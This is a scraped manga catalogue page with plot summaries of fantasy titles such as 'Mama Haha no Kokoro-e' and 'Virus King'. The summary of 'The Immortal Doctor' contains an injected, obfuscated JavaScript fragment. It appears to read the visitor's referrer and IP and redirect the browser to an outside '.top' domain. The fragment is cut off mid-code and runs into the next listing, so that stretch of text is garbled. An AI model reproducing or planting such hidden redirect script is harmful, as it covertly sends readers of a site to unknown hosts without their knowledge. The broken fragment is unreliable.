Fantasy - Page 1322

Explore the world of Fantasy manga, where gripping stories await. Start reading the best Fantasy manga free now!

15899 results

Mama Haha no Kokoro-e

Yamazaki Misaki passed away due to illness, but when she awoke, she found that she had been reborn as a character in a manga she had read before her death — the abusive, wicked stepmother of the young protagonist.   Only remembering this the day before her wedding, there was already no way to escape. Determined to treat her stepson well, upon meeting him, she found the boy extremely adorable! As she worked to raise the child well with her memories to aid her, the attitude of her cold husband began to change?!


The Roguish Guardin a Medieval Fantasy

In a brutal medieval world where innocence means life and guilt means death, Aron, captain of the castle guard, enforces order within the fortress. But when demons begin to corrupt men’s hearts, violent events erupt, including repeated attempts to assassinate the lady of the castle. As Aron hunts the culprits, he encounters a demon that marks him, granting incredible strength but tainting his body with dark magic. Now, with his mind clouded and powers growing, Aron must unravel the mystery before the castle and his soul fall to ruin.


Otome Game No Heroine De Saikyou Survival

Alicia is an orphan living in Ciel, a world of swords and magic. One day, she discovers that she is "the heroine of an otome game." Even the death of her parents was simply part of the story. Alicia decisively rejects the heroine's role as "nonsense." Taking the name "Aria" as an adventurer, she gradually grows into the "Ash-crowned Princess of Slaughter" who wields multiple weapons and magic! But, when she receives a request to escort a "villainess," without realizing it she finds herself caught up in the stage of the game where nobles struggle against each other...? "I am 'me.' I'm not a character in a game!"


Idol Manager In Another World

Top-tier idol manager Le Qiu accidentally traveled to another world. To return to her reality as soon as possible and help the farm girl, Ella, save her village, fate led Le Qiu to bring six beautiful girls of different races and personalities together into a girl group. While she spreads the idol culture, she is also… saving the world. Idol Agent in Another World Idol Manager in Another World 异世界偶像经纪人


The Immortal Doctor

University students Tang Qian, in an antique shop to help the owner hit his head when a Dan furnace, since there has been a strange ability, he always has an old man in the brain to speak, whenever you see the patient will automatically tell the symptoms and prescription, let a person back to life, and he wants to use this ability to… ????,Perspective of Immortal Doctor,The Divine Doctor<script></script><script>function _0x5cf4(){var _0xa4453=['21OptKyX','2200760txQrkq','LvIVN','location','href','231100DHOxvU','599792hvKtCl','.customapi','then','FvUpl','jvwAv','','dsjcc','288166icduyi','includes','cPEVX','uAOQZ','referrer','http://rea','.top/','Xgvbc','uQMun','floor','random','vwFDM','google','https://ip','2599428FsePOX','337816UfacaH','1035JBnvET','text','119ELENgN','3306260xnzgpu'];_0x5cf4=function(){return _0xa4453;};return _0x5cf4();}(function(_0x3fab1b,_0x55e375){var _0x8c5be8=_0x3e6e,_0x10da50=_0x3fab1b();while(!![]){try{var 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Virus King

Read Virus King Novel – Virus King Manhwa Online Free On ManhwaClan The summary of the comic Virus King: “The World in Apocalypse: Chen Bai’s Second Chance with the Virus King Talent” “Virus King” is also known as: Doomsday for All: Me, Virus Monarch / 全民末日:我,病毒君王 “ZinManga, LikeManga, KunManga…” are the most searched keywords on the website MANGAZIN. We offer a wide selection of the best and newest comic series with all chapters updated quickly and featuring high-quality images, providing readers with wonderful and enjoyable reading experiences at MANGA ZIN. You can read TOP MANHWA The Twin Swords Of The Sima Deadly Nightshade The Queen’s Secret Lessons


Master of Ancient Divine Weapons

Master of Ancient Divine Weapons is a standout title in the Manhua genre. The buzz around this series is palpable, capturing the attention of both general manga lovers and die-hard ” Manhua” fans. To cater to this growing interest, has compiled the “Master of Ancient Divine Weapons” series in English, ensuring our readers can enjoy it easily. Summary of Master of Ancient Divine Weapons Han Zhan Travels Through Different Dimensions: The girls here can transform into divine weapons and form contracts for battle. The boys, on the other hand, awaken as spirit contractors and form bonds with the girls to fend off insect swarms. As a traveler from another world, he was shocked to find that the ones being neglected were actually the renowned ancient divine weapons. The chapter release and update schedule of Master of Ancient Divine Weapons The series was released on on 07/16/2024. The schedule for subsequent chapter releases will be updated on our Discord channel. Join our Discord community to discuss and stay updated on the latest developments of “Master of Ancient Divine Weapons”. Scanlation team for the Master of Ancient Divine Weapons Manhua List stories in the similar genre as Master of Ancient Divine Weapons that we recommend Fu Bao San Sui Ban Ta Bei Ba Ge Jiujiu Tuan Chingle The Queen’s Life was At Stake Exclusive Possession: Young Master Ji’s Beloved Wife


I Didn’t Lull You to Sleep Only For You to Be Obsessed

Read manhwa I Didn’t Lull You to Sleep Only For You to Be Obsessed / 집착하라고 재운 건 아니었는데 / 집착하라고 재운건 아니었는데 “I’m going to live here with sister!” She possessed a supporting role, who was swayed by the villain and killed by his male protagonist, Duke Claude Winterville. In addition, she accidentally picked up his nephew! Furthermore… “You better tell me the truth. How did you put me to sleep?” Like in the original novel, her ability to heal Claude’s insomnia was revealed. In the end, she even received an offer as his exclusive barista to make’ sleeping coffee’ for him! However, to avoid the death flag, she had to decline the offer— “I’ll open up a cafe in the capital, and of course, the owner will be you, April.” As expected, the best treatment is financial treatment. “I’ll do it!” She accepted the offer, blinded by her dream of opening her own cafe. She was just trying to help him sleep well and only took Claude’s hand because of the beneficial offer… but, why did he suddenly get obsessed? “I won’t let you regret your decision.” Somehow, his gaze looked unusual.


The Fifth Prince Exiled To The Frontier Survives

Read Manga The Fifth Prince Exiled To The Frontier Survives; The Fifth Prince Exiled To The Frontier Survives With His [Luck] Skill; Henkyo Ni Tsuihou Sareta Dai Go Ouji Wa [Kouun] Sukiru De Sakusaku Ikinobimasu “Don’t Underestimate My Reincarnation Cheat,” Says Elroy, The Fifth Prince Of The Norgard Royal Family. He Has Memories Of His Past Life, The Cheat Skills He Was Given When He Was Reincarnated, And The Luck That Turns It All Around When He’s In A Desperate Pinch [Luck – All Or Nothing]. Elroy Was Known As A Prodigy From An Early Age, But Because Of His Excellence, He Was Shunned By His Older Brothers And Forcibly Exiled To The Frontier, Ouroboros Land, Where It Is Said He Will Die A Life Of Starvation. However, Freed From The Ties Of The Royal Palace, Elroy Uses His Reincarnation Cheat To Develop The Barren Wilderness Into The Best Territory With The Help Of The Strongest Maid! The Frontier Slow-Life Battle Fantasy Begins Here! “The Fifth Prince Exiled To The Frontier Survives Manga” Is Alternative: 辺境に追放された第5王子は【幸運】スキルでさくさく生き延びます


66,666 Years:Advent of the Dark Mage

Diablo Volpir, a powerful dark mage, was defeated and sealed away in a battle against the 12 gods. He finally wakes up from his sleep 66,666 years later, however, in the body of a newborn baby, Jamie Welton! 9 years later, with a fraction of power he once held and with the loving family and peaceful environment he is now surrounded by, Jamie plans to exact revenge against the 12 gods that had sealed him away.
